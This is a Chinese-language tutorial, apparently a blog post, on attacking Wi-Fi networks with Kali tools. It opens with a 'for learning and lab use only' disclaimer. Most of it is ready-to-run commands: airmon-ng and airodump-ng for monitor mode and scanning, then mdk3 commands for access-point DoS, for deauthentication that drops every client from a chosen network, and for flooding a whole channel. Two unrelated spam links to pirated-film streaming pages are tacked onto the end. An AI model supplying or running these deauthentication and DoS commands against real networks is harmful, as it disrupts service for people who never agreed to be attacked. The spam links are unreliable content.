注意:该技术只供学习,研究目的使用,并且在实验室中进行。
1.准备对应的网卡(推荐双频网卡)
2.网卡设置启用
ifconfig
airmon-ng start wlan0(wlan0为上一步看到的网卡)//设置网卡切换到监听(混杂)模式.
ifconfig//再次查看网卡状态,确认是否为监听模式:wlan0mon
3.AP扫描
airodump-ng wlan0mon//扫描附近的wifi信号.
ctrl+c//数量稳定后停止扫描.
BSSID:接入点的MAC地址
//什么是mac地址?
IP地址划分时基于地理区域,换了不同地方,即便是同一台硬件设备,IP地址一定不一样,可以理解为和地理位置有关;而MAC地址不依赖于地理区域,换了不同地方,只要还是同一台硬件设备,MAC地址就不会变,它只和硬件设备有关
PWR:网卡反馈的信号水平,离接入点或基站越近,信号数值就会变得越大,-1表示驱动不支持信号水平.
Beacons:接入点发出的公告报文的数量,
CH:无线信道.
MB:接入点支持的最大速度。MB=11,就是802.1b,MB=22,就是802.1b+,更高的就是802.1g
ENC:OPN表示没有加密,“WEP?”表示不确定是WEP还是WPA/WPA2;WEP表示静态或者动态的WEP,TKIP或者CCMP表示WPA/WPA2
AUTH:使用的认证协议。GMT(WPA/WPA2 使用单独的认证服务器),SKA(WEP共享密钥) ,PSK(WPA/WPA2 预共享密钥),或者OPN(WEP开放认证)
ESSID:注意与BSSID之间的区别.无线网络名称,在kali中,有时出现找不到目标WiFi名称的情况,这种情况下请检查网卡是否支持5g,是否开启了5g监听模式。
扫描5g频段:airodump-ng -C 5180-5885 wlan0mon
4.扫描目标Wifi下的存货主机.
mdk3 wlan0mon w -e [MAC]//MAC地址可以从AP监听的BSSID中得到.
5.向指定AP发起DoS攻击.(不是很有效的做法)
mdk3 wlan0mon a -a [MAC]
6.发起取消认证攻击(重点)
mdk3 wlan0mon d [MAC]//攻击单一WIFI,发动攻击时,该WiFi下主机全部掉线。
7.按照信道攻击附近目标信道下的WiFi.
mdk3 wlan0mon d -c [信道号,例如1]
《加萨战争下的孩童》记录片高清在线免费观看:https://www.jgz518.com/xingkong/133262.html
《封神雷震子》剧情片高清在线免费观看:https://www.jgz518.com/xingkong/15735.html